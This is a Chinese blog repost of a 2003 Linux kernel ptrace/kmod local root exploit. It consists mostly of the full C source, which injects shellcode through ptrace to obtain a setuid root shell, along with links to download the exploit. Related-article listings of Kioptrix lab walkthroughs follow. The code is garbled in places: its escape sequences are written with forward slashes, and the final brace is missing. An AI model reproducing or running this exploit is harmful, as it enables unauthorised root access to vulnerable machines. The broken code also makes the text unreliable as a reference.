Ptrace Vulnerability Allows Gaining of Elevated Privileges under Linux

最新推荐文章于 2025-06-04 19:20:27 发布
最新推荐文章于 2025-06-04 19:20:27 发布
阅读量894 收藏
点赞数
分类专栏: *IX和BSD系統 文章标签: signal struct security kill dst linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/iiprogram/article/details/1842675
版权
本文介绍了一个在Linux 2.2.x和2.4.x内核中存在的提权漏洞利用方法,该方法通过ptrace机制实现本地权限提升,文中提供了详细的代码示例。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Sample exploit here (ix86-only):
http://august.v-lo.krakow.pl/~anszom/km3.c
or
http://isec.pl/cliph/isec-ptrace-kmod-exploit.c

Exploit:
----------------------------------------------------------------------
/*
* Linux kernel ptrace/kmod local root exploit
*
*
*
* Should work under all current 2.2.x and 2.4.x kernels.
*
* I discovered this stupid bug independently on January 25, 2003, that
* is (almost) two month before it was fixed and published by Red Hat
* and others.
*
* Wojciech Purczynski <cliph@xxxxxxx>
*
* THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY*
* IT IS PROVIDED "AS IS" AND WITHOUT ANY WARRANTY
*
* (c) 2003 Copyright by iSEC Security Research
*/

#include < grp.h>
#include <stdio.h>
#include <fcntl.h>
#include <errno.h>
#include <paths.h>
#include <string.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>
#include <sys/wait.h>
#include <sys/stat.h>
#include <sys/param.h>
#include <sys/types.h>
#include <sys/ptrace.h>
#include <sys/socket.h>
#include <linux/user.h>

char cliphcode[] =
"/x90/x90/xeb/x1f/xb8/xb6/x00/x00"
"/x00/x5b/x31/xc9/x89/xca/xcd/x80"
"/xb8/x0f/x00/x00/x00/xb9/xed/x0d"
"/x00/x00/xcd/x80/x89/xd0/x89/xd3"
"/x40/xcd/x80/xe8/xdc/xff/xff/xff";

#define CODE_SIZE (sizeof(cliphcode) - 1)

pid_t parent = 1;
pid_t child = 1;
pid_t victim = 1;
volatile int gotchild = 0;

void fatal(char * msg)
{
perror(msg);
kill(parent, SIGKILL);
kill(child, SIGKILL);
kill(victim, SIGKILL);
}

void putcode(unsigned long * dst)
{
char buf[MAXPATHLEN + CODE_SIZE];
unsigned long * src;
int i, len;

memcpy(buf, cliphcode, CODE_SIZE);
len = readlink("/proc/self/exe", buf + CODE_SIZE, MAXPATHLEN - 1);
if (len == -1)
  fatal("[-] Unable to read /proc/self/exe");

len += CODE_SIZE + 1;
buf[len] = '/0';

src = (unsigned long*) buf;
for (i = 0; i < len; i += 4)
  if (ptrace(PTRACE_POKETEXT, victim, dst++, *src++) == -1)
   fatal("[-] Unable to write shellcode");
}

void sigchld(int signo)
{
struct user_regs_struct regs;

if (gotchild++ == 0)
  return;

fprintf(stderr, "[+] Signal caught/n");

if (ptrace(PTRACE_GETREGS, victim, NULL, &regs) == -1)
  fatal("[-] Unable to read registers");

fprintf(stderr, "[+] Shellcode placed at 0x%08lx/n", regs.eip);

putcode((unsigned long *)regs.eip);

fprintf(stderr, "[+] Now wait for suid shell.../n");

if (ptrace(PTRACE_DETACH, victim, 0, 0) == -1)
  fatal("[-] Unable to detach from victim");

exit(0);
}

void sigalrm(int signo)
{
errno = ECANCELED;
fatal("[-] Fatal error");
}

void do_child(void)
{
int err;

child = getpid();
victim = child + 1;

signal(SIGCHLD, sigchld);

do
  err = ptrace(PTRACE_ATTACH, victim, 0, 0);
while (err == -1 && errno == ESRCH);

if (err == -1)
  fatal("[-] Unable to attach");

fprintf(stderr, "[+] Attached to %d/n", victim);
while (!gotchild) ;
if (ptrace(PTRACE_SYSCALL, victim, 0, 0) == -1)
  fatal("[-] Unable to setup syscall trace");
fprintf(stderr, "[+] Waiting for signal/n");

for(;;);
}

void do_parent(char * progname)
{
struct stat st;
int err;
errno = 0;
socket(AF_SECURITY, SOCK_STREAM, 1);
do {
  err = stat(progname, &st);
} while (err == 0 && (st.st_mode & S_ISUID) != S_ISUID);

if (err == -1)
  fatal("[-] Unable to stat myself");

alarm(0);
system(progname);
}

void prepare(void)
{
if (geteuid() == 0) {
  initgroups("root", 0);
  setgid(0);
  setuid(0);
  execl(_PATH_BSHELL, _PATH_BSHELL, NULL);
  fatal("[-] Unable to spawn shell");
}
}

int main(int argc, char ** argv)
{
prepare();
signal(SIGALRM, sigalrm);
alarm(10);

parent = getpid();
child = fork();
victim = child + 1;

if (child == -1)
  fatal("[-] Unable to fork");

if (child == 0)
  do_child();
else
  do_parent(argv[0]);

return 0;
Kioptrix Level 1 靶机wp
m0_52496313的博客
08-10 1175
Kioptrix Level 1 靶机wp
Kioptrix Level 1 渗透方案
SecUpdate的专栏
06-22 3230
目标:Kioptrix Level 1[VMWare] 本机环境:BackTrack5 RC3[VMware](192.168.74.145) 网关:192.168.74.254 使用工具:nmap #1:查看 Kioptrix 在内网的IP地址。 工具:nmap 命令:nmap 192.168.74.0/24 –n –sP -sn 得到IP:192.168.74.1
Kioptrix-1
qq_62066842的博客
03-29 458
vulnhub入门靶场Kioptrix系列练习
vulnhub-Kioptrix_Level_1靶机的测试报告
ccc_9wy的博客
10-11 1295
基于渗透测试流程测试Kioptrix_Level_1靶机;mod_ssl2.8版本漏洞;获取root权限;smb2.2版本漏洞;远程工具提权root;远程获取shell;
vulnhub Kioptrix: Level 1 (#1)
箭雨镜屋
11-16 1786
本文使用的方法是利用apache mod_ssl 2.8.4的Remote Buffer Overflow漏洞(CVE-2002-0082)getshell并拿到root权限
LinuxPtrace()调用的安全分析.pdf
09-07
"LinuxPtrace()调用的安全分析" Ptrace()是 Linux 操作系统中的一种系统调用,它提供了对运行中的进程进行跟踪和控制的能力。这项技术广泛应用于程序开发和调试中,但是在安全方面,它也存在一定的隐患。本文将对...
dlinject:在没有ptrace的情况下将共享库(即任意代码)注入实时linux进程
02-04
在不使用ptrace的情况下,将共享库(即任意代码)注入实时linux进程中。 受和启发。 用法 .___.__ .__ __ __ __| _/| | |__| ____ |__| ____ _____/ |_ ______ ___.__. / __ | | | | |/ \ | |/ __ \_/ ___\ __\ ...
论文研究-LinuxPtrace()调用的安全分析.pdf
07-22
Linux下的系统调用Ptrace()所拥有的进程跟踪和控制调试功能进行了分析;结合内核漏洞的具体实例研究其对系统可能造成的安全威胁;最后就病毒技术中的一项关键技术——隐藏,讨论了Ptrace()在Linux病毒隐藏技术中的...
ptrace_32.rar_Linux/Unix编程_Unix_Linux_
08-11
ptrace在32位进程中的应用——深入理解Linux/Unix编程》 在Linux和Unix系统中,ptrace是一个强大的系统调用,它允许一个进程(通常被称为tracer)监控和控制另一个进程(被追踪者)。在本文中,我们将深入探讨...
linux kernel ptrace 流程梳理
techtitan的专栏
11-07 503
ptrace 背景 ptracelinux 中跟踪进程使用的一种方式手段,主要方法是使用stop 信号将目的进程stop掉, 然后使用gup.c中的get_user_page对目的进程的地址空间进行访问 从代码角度讲,ptracelinux 的一个系统调用, 详细描述可以man ptrace查看 代码流程 ptrace 系统调用 代码文件 kernel/ptrace.c 主要代码流程: ptrace_attach: 1) ptrace_link将自己链接到parent 2) 将对方任务stop掉,
Kioptix Level 1靶场渗透测试
sucker的博客
12-04 2832
学习视频来自B站up主 **泷羽sec** 有兴趣的师傅可以关注一下,如涉及侵权马上删除文章,笔记只是方便各位师傅的学习和探讨,文章所提到的网站以及内容,只做学习交流,其他均与本人以及泷羽sec团队无关,切勿触碰法律底线,否则后果自负!根据你提供的问题,你正在尝试执行一段命令序列,其中包括下载一个名为“ptrace-kmod.c”的文件,编译它,删除源文件,并最终运行生成的可执行文件。然而,在执行过程中,你遇到了几个问题。最后,rm命令也无法删除名为“ptrace-kmod.c”的文件,因为该文件不存在。
The Importance of Acquiring the Methods of Gaining Knowledge Rather Than Knowledge Itself
Unitue_逆流
12-07 3203
The importance of acquiring the methods of gaining knowledge rather than knowledge itself.I agree this view. Because teach a student a knowledge,a student may only know this knowledge,but if you taugh
Malware FAQ: How does the Ptrace exploit work o...
weixin_33971205的博客
06-27 257
2019独角兽企业重金招聘Python工程师标准>>> ...
如何利用Ptrace拦截和模拟Linux系统调用
sunshineywz的博客
09-24 643
strace 在开始之前,我们先看一看strace的实现骨架。Ptrace一直都没有相应的使用标准,但在不同的操作系统中它的接口都是类似的,尤其是它的核心功能,但多多少少都会有一些细微的差别。Ptrace(2)的原型类似如下: long ptrace(int request, pid_t pid, void *addr, void *data); pid是tracee的进程ID,一个tracee一...
the importance of affective expression
zrcshendustudy的博客
04-21 240
 &lt;html&gt;&lt;head&gt;&lt;title&gt;the importance of affective expression&lt;/title&gt;&lt;/head&gt; &lt;body&gt;&lt;h1 align="center"&gt;&lt;a href="www.baidu.com"&gt;t
linux ptrace 读内存,c - 使用ptrace读取字符串(Linux) - 堆栈内存溢出
weixin_42118160的博客
05-03 452
我是刚接触栈的人,而对C来说是相对陌生的。我尝试使用ptrace从另一个进程读取进程内存。 到目前为止,我设法从另一个过程中读取和更改数字。 但是用字符串我找不到办法。 这是我的代码:int errno;//the string we want to read is 8 bytes longlong len = 8;const int buflen = (len / sizeof(long)...
LinuxLinux 环境变量
最新发布
Antonio915的博客
06-04 943
每个程序都会收到一张环境表,环境表是一个字符指针数组,每个指针指向一个以’\0’结尾的环境字符串。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值